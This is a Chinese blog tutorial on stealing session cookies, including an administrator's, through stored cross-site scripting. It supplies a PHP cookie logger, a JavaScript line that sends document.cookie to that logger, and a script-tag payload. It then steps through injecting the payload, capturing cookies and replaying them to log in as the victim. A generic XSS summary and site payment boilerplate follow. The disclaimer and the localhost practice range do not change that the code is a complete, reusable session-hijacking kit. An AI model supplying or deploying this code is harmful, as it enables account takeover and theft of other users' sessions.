通过XSS注入获取管理员cookie

注:本片文章仅供学习参考!利用本文做的所有事情与作者无关!

实验环境

1、WAMP

2、Firefox 游览器

3、在线靶场

4、WINDOWS系统

实验准备

首先在wamp的www目录下准备两个文件

第一个文件名为log.php,内容如下:

<?php
$cookie=$_GET['cookie'];
$str=fopen('cookie.txt','a+');
fwrite($str,"$cookie\n");
fclose($str);
?>

代码实现通过URL传参,并把其保存到当前目录下的cookie.txt文件中,cookie.txt文件需要提前创建!
第二个文件名为1.js,内容如下:

new Image().src="http://127.0.0.1/log.php?cookie=" + encodeURI(document.cookie);

js的内容为获取当前cookie值,并把它作为参数传递到前面的URL中

代码测试

访问log.php并传入参数6666666
访问
可以发现页面并无任何显示

然后访问当前目录下的cookie.txt
在这里插入图片描述
发现cookie.txt显示我们刚才传入的参数,说明代码并无问题。

开始注入

构造payload
<script src=//127.0.0.1/1.js></script>
在注入点开始注入

在这里插入图片描述
在这里插入图片描述

保存之后刷新页面

在这里插入图片描述
可以看到1.js已经正常相应,此时刷新cookie.txt页面
在这里插入图片描述
可以看到,已经获取到cookie值
然后使用插件修改cookie值进行测试
在这里插入图片描述
修改之后保存cookie,当捕获到多个cookie值时,每个都要有,否则可能会无法完成登录!如下:
在这里插入图片描述

在这里插入图片描述
所有cookie都编辑好之后刷新登录页面发现登录成功!
在这里插入图片描述

获取管理员COOKIE同理,当你把XSS注入到你的个人信息中时,管理员在查看你的个人信息时就会获取到管理员的COOKIE(并不是一定会成功)然后将管理员的COOKIE发送到你的URL下的TXT文件中
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者可以通过注入恶意脚本来获取用户的感信息,如cookie。在存储型XSS击中,攻击者将恶意脚本存储在目标网站的数据库中,当其他用户或管理员访问包含该恶意脚本的页面时,脚本会被执行,从而导致用户的cookie信息被窃取。 根据引用[1]提供的信息,攻击者可以在目标网站的博客或论坛等地方发表帖子或留下评论,内容包含恶意脚本。当其他用户或管理员打开包含恶意脚本的页面时,脚本会触发并将用户的cookie信息发送到攻击者指定的网站。 引用[2]提供了一个获取cookie的示例代码,其中的cookie.asp文件会将获取到的cookie信息写入到code.txt文件中。攻击者可以通过构造恶意脚本,将cookie信息发送到自己的服务器上。 引用[3]提供了另一种获取cookie的方法,通过将cookie信息作为参数发送到指定的URL,攻击者可以在该URL的服务器上获取到用户的cookie信息。 总结来说,攻击者可以通过存储型XSS漏洞,在目标网站上注入恶意脚本,从而获取用户的cookie信息。这些信息可以被用于未授权访问用户账户等恶意行为。为了防止XSS攻击,网站开发者应该对用户输入进行严格的过滤和转义,以防止恶意脚本的注入。用户也应该保持浏览器和操作系统的更新,并避免点击可疑的链接或下载未知来源的文件,以减少受到XSS攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值